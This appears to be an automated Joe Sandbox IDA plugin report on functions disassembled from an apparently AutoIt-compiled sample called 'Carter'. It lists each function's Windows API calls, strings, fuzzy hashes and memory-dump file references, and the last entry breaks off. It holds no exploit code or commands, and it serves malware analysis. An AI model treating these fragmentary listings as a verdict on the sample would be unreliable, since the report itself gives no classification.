INVALID, xrefs: 00C5BBD2
READONLY, xrefs: 00C5BBCB

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 45817ee3302dcb6dce7c80e63954941402ace8283a4801761416721d5ef7a4ea
Instruction ID: 28e261197543054ed60e0773b32b20d19c837c57eb0f5bf820f2d40e9f05163c
Opcode Fuzzy Hash: 45817ee3302dcb6dce7c80e63954941402ace8283a4801761416721d5ef7a4ea
Instruction Fuzzy Hash: 2131C138A00209AFCB10DF69C845FBEBBB4EF44305F148065EC05D7296DBB19E89CB95

Function 00C49B47 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C01A36: _memmove.LIBCMT ref: 00C01A77

Part of subcall function 00C4B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00C4B7BD

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00C49BCC
GetDlgCtrlID.USER32 ref: 00C49BD7
GetParent.USER32 ref: 00C49BF3
SendMessageW.USER32(00000000,?,00000111,?), ref: 00C49BF6
GetDlgCtrlID.USER32(?), ref: 00C49BFF
GetParent.USER32(?), ref: 00C49C1B
SendMessageW.USER32(00000000,?,?,00000111), ref: 00C49C1E

Strings

ListBox, xrefs: 00C49B89
ComboBox, xrefs: 00C49B54

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 5720197cbb9636f30eb41419e6b491376cebcc544f854133ada0202f5a110337
Instruction ID: 3cdfd9c9abcbfdf86bc37374e738a5b23e19e24d3b693beff17e2b47bcad26fe
Opcode Fuzzy Hash: 5720197cbb9636f30eb41419e6b491376cebcc544f854133ada0202f5a110337
Instruction Fuzzy Hash: A021AC71A00114ABDF04ABA0CC85EFEBBB9FF96310F100115F961932E1EB748929EB20

Function 00C49C32 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C01A36: _memmove.LIBCMT ref: 00C01A77

Part of subcall function 00C4B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00C4B7BD

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00C49CB5
GetDlgCtrlID.USER32 ref: 00C49CC0
GetParent.USER32 ref: 00C49CDC
SendMessageW.USER32(00000000,?,00000111,?), ref: 00C49CDF
GetDlgCtrlID.USER32(?), ref: 00C49CE8
GetParent.USER32(?), ref: 00C49D04
SendMessageW.USER32(00000000,?,?,00000111), ref: 00C49D07

Strings

ListBox, xrefs: 00C49C74
ComboBox, xrefs: 00C49C3F

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 06080dd2c81f863be619ad1a277088fa367ff5ab0c24210ea0253f922699d9e1
Instruction ID: 60dfba65d88b5cff5a0ebc9ad54c02159b0e5a3137d0cee6b3db22c6f58608e1
Opcode Fuzzy Hash: 06080dd2c81f863be619ad1a277088fa367ff5ab0c24210ea0253f922699d9e1
Instruction Fuzzy Hash: 6A219D75E40114BBDB00ABA0CC85FFEBBB9FF95300F200115BD6197291EB758929EB24

Function 00C68F95 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C68FC1
CoInitialize.OLE32(00000000), ref: 00C68FEE
CoUninitialize.OLE32 ref: 00C68FF8
GetRunningObjectTable.OLE32(00000000,?), ref: 00C690F8
SetErrorMode.KERNEL32(00000001,00000029), ref: 00C69225
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00C83BDC), ref: 00C69259
CoGetObject.OLE32(?,00000000,00C83BDC,?), ref: 00C6927C
SetErrorMode.KERNEL32(00000000), ref: 00C6928F
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C6930F
VariantClear.OLEAUT32(?), ref: 00C6931F

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 6766573f2569f275b3819947acc950658b045742105fd2070620fbf74a69c197
Instruction ID: fcc51b9aad4c8db1b16c4a95648c4c388594f635d299a599c6a5c835e2be94c5
Opcode Fuzzy Hash: 6766573f2569f275b3819947acc950658b045742105fd2070620fbf74a69c197
Instruction Fuzzy Hash: AEC135B1208305AFC710DF64C884A2BB7E9FF89708F10495DF99A9B251DB71ED49CB52

Function 00C519CD Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00C519EF
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C50A67,?,00000001), ref: 00C51A03
GetWindowThreadProcessId.USER32(00000000), ref: 00C51A0A
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C50A67,?,00000001), ref: 00C51A19
GetWindowThreadProcessId.USER32(?,00000000), ref: 00C51A2B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C50A67,?,00000001), ref: 00C51A44
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C50A67,?,00000001), ref: 00C51A56
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00C50A67,?,00000001), ref: 00C51A9B
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00C50A67,?,00000001), ref: 00C51AB0
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00C50A67,?,00000001), ref: 00C51ABB

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 95d9743039b187d2b7f052b13796e2f9026ccf385f03a142ef50bfe786ddc4ff
Instruction ID: a02a5517da3e5a08ae6e51e12d6c06c05ad68a99e5ed1b0def6ab358f5ab78b0
Opcode Fuzzy Hash: 95d9743039b187d2b7f052b13796e2f9026ccf385f03a142ef50bfe786ddc4ff
Instruction Fuzzy Hash: 8D31E179501204BFDB129F90DC48BBD37AEEB54316F244215FC10C6190DB749EC8DB18

Function 00C2C0E3 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00BF260D
SetTextColor.GDI32(?,000000FF), ref: 00BF2617
SetBkMode.GDI32(?,00000001), ref: 00BF262C
GetStockObject.GDI32(00000005), ref: 00BF2634
GetClientRect.USER32(?), ref: 00C2C0FC
SendMessageW.USER32(?,00001328,00000000,?), ref: 00C2C113
GetWindowDC.USER32(?), ref: 00C2C11F
GetPixel.GDI32(00000000,?,?), ref: 00C2C12E
ReleaseDC.USER32(?,00000000), ref: 00C2C140
GetSysColor.USER32(00000005), ref: 00C2C15E

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: aa2e134e15aea6b813d130004b6525466c5097846de00a5ccfd156813b553107
Instruction ID: 5b930a7f5324abbfabbe3ee1bb1b00208b1e9dc451bce05709011b9c60d46480
Opcode Fuzzy Hash: aa2e134e15aea6b813d130004b6525466c5097846de00a5ccfd156813b553107
Instruction Fuzzy Hash: 66113A32500205BFDBA15FA4EC49BED7BB1EF58331F204265FA65950E1CB310959EF25

Function 00BFAD98 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00BFADE1
OleUninitialize.OLE32(?,00000000), ref: 00BFAE80
UnregisterHotKey.USER32(?), ref: 00BFAFD7
DestroyWindow.USER32(?), ref: 00C32F64
FreeLibrary.KERNEL32(?), ref: 00C32FC9
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C32FF6

Strings

close all, xrefs: 00BFADDC

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: fc4350ee2583efe081bbbd6263af7e30d82bd280f7aa56a4d88ec703332736b4
Instruction ID: bfe86bd44805c6ec5c5b1f59cbea8ca451ab7d789b17c886a5e6ba7ae1904321
Opcode Fuzzy Hash: fc4350ee2583efe081bbbd6263af7e30d82bd280f7aa56a4d88ec703332736b4
Instruction Fuzzy Hash: 71A15E74711222CFCB29EF54C495B69F7A4FF04700F2442ADE90AAB251CB31AE5ADF91

Function 00C4AD69 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00C4B13A), ref: 00C4B078

Strings

REGEXPCLASS, xrefs: 00C4AE3D
INSTANCE, xrefs: 00C4AF86
CLASSNN, xrefs: 00C4AE1A
TEXT, xrefs: 00C4AFAF
CLASS, xrefs: 00C4ADF7
NAME, xrefs: 00C4AEAA

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: e4abfdc3ecd702aaa9dd523c4787ce25fb3868cd97ff49f39d1c53ac8550ea31
Instruction ID: beea13ce5c4076715a606266dcba3870e8b5cb396c4a5c9611b6a51431db4dbb
Opcode Fuzzy Hash: e4abfdc3ecd702aaa9dd523c4787ce25fb3868cd97ff49f39d1c53ac8550ea31
Instruction Fuzzy Hash: 47916AB0500506EBDB58EFA0C481BEEFB75BF05304F548119E86AA7191DF30AA9DEB91

Function 00BF31F6 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00BF327E

Part of subcall function 00BF218F: GetClientRect.USER32(?,?), ref: 00BF21B8
Part of subcall function 00BF218F: GetWindowRect.USER32(?,?), ref: 00BF21F9
Part of subcall function 00BF218F: ScreenToClient.USER32(?,?), ref: 00BF2221

GetDC.USER32 ref: 00C2D073
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00C2D086
SelectObject.GDI32(00000000,00000000), ref: 00C2D094
SelectObject.GDI32(00000000,00000000), ref: 00C2D0A9
ReleaseDC.USER32(?,00000000), ref: 00C2D0B1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00C2D13C

Strings

U, xrefs: 00C2D011

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 082eed9b1dfbc63119adb18248074ecd82281e536f43db41a330038ce437dd65
Instruction ID: 2e09b153bd586c0b48fda82dde9b6529cfb4c4049a7768fa6de27435ec1c4f5b
Opcode Fuzzy Hash: 082eed9b1dfbc63119adb18248074ecd82281e536f43db41a330038ce437dd65
Instruction Fuzzy Hash: 9871E130404209DFCF218F64D884ABE7BB5FF59320F2442A9EE665B6A6C7318E55DF60

Function 00C7C634 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BF29F3

Part of subcall function 00BF2714: GetCursorPos.USER32(?), ref: 00BF2727
Part of subcall function 00BF2714: ScreenToClient.USER32(00CB77B0,?), ref: 00BF2744
Part of subcall function 00BF2714: GetAsyncKeyState.USER32(00000001), ref: 00BF2769
Part of subcall function 00BF2714: GetAsyncKeyState.USER32(00000002), ref: 00BF2777

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00C7C69C
ImageList_EndDrag.COMCTL32 ref: 00C7C6A2
ReleaseCapture.USER32 ref: 00C7C6A8
SetWindowTextW.USER32(?,00000000), ref: 00C7C752
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00C7C765
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00C7C847

Strings

@GUI_DROPID, xrefs: 00C7C799
@GUI_DRAGFILE, xrefs: 00C7C7DC

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 9a9020dbc145b91d12a5343db80785775992cbcd35dbfd8db898480fcd758218
Instruction ID: 749d43d019c0a32ffce4e2f3f8d0a44978456df8e7ba8fb69fecd3c3036abf50
Opcode Fuzzy Hash: 9a9020dbc145b91d12a5343db80785775992cbcd35dbfd8db898480fcd758218
Instruction Fuzzy Hash: 1B518B71208205AFDB04EF14CC9AF6E7BE5FB84310F10862DF959972E2CB71A948DB52

Function 00C620E1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C6211C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C62148
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00C6218A
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C6219F
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C621AC
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00C621DC
InternetCloseHandle.WININET(00000000), ref: 00C62223

Part of subcall function 00C62B4F: GetLastError.KERNEL32(?,?,00C61EE3,00000000,00000000,00000001), ref: 00C62B64
Part of subcall function 00C62B4F: SetEvent.KERNEL32(?,?,00C61EE3,00000000,00000000,00000001), ref: 00C62B79

Strings

, xrefs: 00C621CD

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: baee9d9160336b1e2c0dbb5b8217608aee165d7d682ac6d78add91dd333e7162
Instruction ID: 32ebcf5a568d56fd3c25431a14d791db2913f18287015c15effb0e3e0358a2f5
Opcode Fuzzy Hash: baee9d9160336b1e2c0dbb5b8217608aee165d7d682ac6d78add91dd333e7162
Instruction Fuzzy Hash: 9D417CB1501A18BFEB229F50CCC9FBF7BACEF08354F104116FA159A181D774AE449BA4

Function 00C69330 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00C80980), ref: 00C69412
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00C80980), ref: 00C69446
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00C695C0
SysFreeString.OLEAUT32(?), ref: 00C695EA

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 430b4fe9b0fd60c85245a8c2463904b0af142526545da1f1e51ffca8b926019f
Instruction ID: 5e6319d3f1322b22200b088f0bcbfc0669c909dc866667c3640990473187b9bd
Opcode Fuzzy Hash: 430b4fe9b0fd60c85245a8c2463904b0af142526545da1f1e51ffca8b926019f
Instruction Fuzzy Hash: 3CF11C71A00219EFDF14DF94C884EAEB7B9FF45314F108598F51AAB261DB31AE46CB50

Function 00C6FD7D Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C6FD9E
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C6FF31
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C6FF55
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C6FF95
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C6FFB7
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C70133
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00C70165
CloseHandle.KERNEL32(?), ref: 00C70194
CloseHandle.KERNEL32(?), ref: 00C7020B

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: a9183a6a9ecf725379383516aa6176e846fea8638ec2c06070def474e54de51f
Instruction ID: 57aa8b6fb40f08c9aaa0507277aa55d6fbed091d971b80b030d63719d542fbc5
Opcode Fuzzy Hash: a9183a6a9ecf725379383516aa6176e846fea8638ec2c06070def474e54de51f
Instruction Fuzzy Hash: AFE1AB31204301DFC725EF24C891B6EBBE1AF85314F24896DF9999B2A2CB31ED45DB52

Function 00C5527C Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C54BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C53B8A,?), ref: 00C54BE0

Part of subcall function 00C54BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C53B8A,?), ref: 00C54BF9

Part of subcall function 00C54FEC: GetFileAttributesW.KERNEL32(?,00C53BFE), ref: 00C54FED

lstrcmpiW.KERNEL32(?,?), ref: 00C552FB
_wcscmp.LIBCMT ref: 00C55315
MoveFileW.KERNEL32(?,?), ref: 00C55330

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 16f071baf7ac48b0a65f3df2767dee3e0746a0753ec9d6090d39f3e89acf7667
Instruction ID: 38e1cfe1a37f6417d0e99e18063adb0112569b44229a9985b2538069dbd1d1b6
Opcode Fuzzy Hash: 16f071baf7ac48b0a65f3df2767dee3e0746a0753ec9d6090d39f3e89acf7667
Instruction Fuzzy Hash: 3A5174B61087859BC764DBA0D8919DFB3EC9F85301F50091EB989C3152EF34A6CCD75A

Function 00C78C6A Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00C78D24

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: f8c74c8079b1db0e60a45fae1a4f694d134a664c19cb7b9b09ef28888e816a27
Instruction ID: 0a4044dfb39b38f48a482f8eb567dd6a972003fa75b9a8e783f9a1bd28fd42d6
Opcode Fuzzy Hash: f8c74c8079b1db0e60a45fae1a4f694d134a664c19cb7b9b09ef28888e816a27
